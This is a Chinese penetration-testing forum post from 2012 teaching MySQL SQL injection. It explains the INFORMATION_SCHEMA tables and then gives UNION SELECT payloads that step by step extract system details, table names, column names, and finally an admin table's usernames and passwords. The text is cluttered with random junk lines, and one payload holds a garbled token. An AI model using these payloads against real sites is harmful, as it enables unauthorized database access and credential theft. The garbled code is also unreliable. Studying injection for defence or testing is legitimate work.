中国网络渗透测试联盟
标题:
mysql常规注入
[打印本页]
作者:
admin
时间:
2012-9-13 17:48
标题:
mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
8 R, u2 G( o& J9 I" ]
: o# @" `8 @' x& O9 U3 ~ L
学习盲注前先了解下 IFORMATION_SCHEMA 库
' _4 q8 ` G! t* |; t5 t
% e- ?/ s. w: p5 y% F* V
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
" S4 ^. W! t9 Z9 m/ ~) ]+ ~
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
3 @ b }' e8 Y3 t$ p
1.得到所有数据库名:
4 A- r. F# \ h6 |$ u" w- g& Y
|SCHEMATA ->存储数据库名的表
( x1 n$ R7 w: u5 n7 j
|---字段:SCHEMA_NAME ->数据库名称
- N9 W" g) l* ^+ u1 H9 t8 S
$ W& Y! L. k1 v8 f+ ^/ [
|TABLES ->存储表名
2 X' a6 |* J# W- ` `+ e! v& g
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
/ [! l. X. ^" \
|---字段:TABLE_NAME ->存储表的表名
1 K, V) K+ c7 v6 j& q- _
; Z. a9 m4 Z- ?; g7 M2 N7 z. |& l" A
|COLUMNS ->存储的字段名表
& y. o8 L# u* t' k+ k
|---字段:TABLE_SCHEMA ->该字段所属数据库名
1 g% {8 Q! r7 d! J: }- a% M$ y
|---字段:TABLE_NAME ->存储所属表的名称
- r7 ?1 Y2 S7 a; Q2 h3 T' E
G6 ^! z7 D4 A4 w! l& f* ^
|---字段:COLUMN_NAME ->该字段的名称
" ~" O: l. L1 ^ f: I. L
. c( j. C: B) l; q" |4 c
% w, ^: Z, v; M; ?5 g
8 l- l0 Z1 a8 s- O1 d
###########################################################################
. |' O# j* J" }2 u9 v9 b
`* s9 @" i' l+ M6 x3 U
0x001 获取系统信息:
% M& F/ b! R. M2 _2 {" m7 b2 I
2 l5 z1 Z ?) J
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
1 b9 o4 E7 L' y" K- X+ u! M' P* ]
! E, K) ~- z( c0 {$ L4 H
/*
/ k0 M! u8 o$ v$ d5 O9 q
9 d' \* p& |+ m; o
@@global.version_compile_os 获取系统版本
7 t' G) k [% m( v9 [" p; ^" s
3 V" C5 q$ R7 {/ e
@@datadir 数据库路径
- B& r/ g: v$ D! ^. N
database() 当前数据库名称
" F% f7 L. l. j+ f
0x3c62723e 换行HEX值
! n0 { n- T3 f$ z$ M. K
1 o- n8 G( |2 T$ N
*/
; L* E& l) p/ v
4 P0 U5 e: t2 E& Q/ G- s
0 W7 y% g) B( d, m5 b8 P, [3 A1 S
/ D, @9 I2 B* ]5 }! ]+ k% w
######################################################################
6 _8 p" d7 H7 X7 d% w( J9 ]
; S% e0 G) o( c8 ]2 ~/ d
0x002 获取表名
# I7 y+ D+ C$ |- S, A& h
3 c0 K T. S7 ]0 ?) O# G% O
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
0 o1 ?- t, u$ `# F
8 E6 y) M2 a( q! S" l. t: W
, G" y; m- y1 G1 ~
; x5 d" R/ z1 ^$ X; O8 C' x
/*
9 C Y8 T/ c/ O. m) X, I
7 X+ B, b8 d" y+ U; r" G
0x67617264656e 为当前数据库名
5 i2 T) l3 n6 x) u
$ Z8 @+ i7 p: V+ Z5 [
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
& |1 C) [5 e, x' l7 [
: W8 j( r Z; H8 u; U+ j; D
*/
# q# y* Q! s9 W( G5 b6 r% t; ?$ m
0 A" d! T- E8 J9 P% {3 ]
######################################################################
# x) B1 N" C+ x6 ?6 M# Z
0 C- U) `2 f/ P* {! @+ }8 a7 S* b
, ]% w+ y- M1 q8 w
8 s9 s3 y- j+ t6 A
0x003 获取字段
* I- e6 u4 C) @3 U
8 s& ~/ ~$ \4 @% h- M% y3 w0 X" t
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
6 n( c# Q8 K! U* u9 X- j
& v$ {3 @- k- K, j, P: ]4 v
/*
4 p& {4 W& z* @9 y" Z# ~
6 N* w" D8 o( I4 H
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
J/ t5 \6 P% P
- i7 F; \5 ~7 R0 A. I
0x61646d696e ->选择一个表
# }2 Y; c9 d# u! L* Y6 r
% _9 C3 i- S% S: f' j8 c
0x67617264656e ->数据库名
) M! N8 A$ v8 l: [* k7 O6 V3 X
$ U W( ~/ e% E3 I0 d; ]! x
*/
) z/ S* }1 y P
+ w: K2 x( s' |& g0 ~
#####################################################################
9 J g$ G2 X+ u0 C: W# [" ~
0 h1 d/ F$ ?; A$ U. q1 Q7 J' R
( V- ~ z7 ^+ r, v
. z/ s$ X6 s; s0 G! }
0x004 获取数据
+ P" N" a* i+ a3 G
d( n5 o1 ~4 m0 L1 u7 S
union select 1,2,3
0 ]# s* r: T. x0 `) q
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
, `7 z% l) j$ `" n7 C& a* }" e
: ~9 v* f( L; K% n+ ?( T
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
0 i/ R* R! X# H
" `9 f# O( N& H
- O: z& I+ C! [3 p( p
5 x6 _" T; b' Q0 Q3 I
/*
1 e t6 Y' Y6 `4 d' Z
7 M3 R) o4 u, a0 Z; ?# N a5 |
0x3c62723e 换行符号HEX编码
9 q5 u) {; L! T7 P- J: Q v
2 W4 }1 {* l! r+ }! l* w: V
group_concat 同时获得该字段所有数据
4 A. m5 W4 u6 `% ^4 }, {
2 X- A9 t! q3 w+ \$ P
*/
, Z% G. [. ~9 b6 M( P( y
6 [2 G1 Y7 u4 P' w: X/ X
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2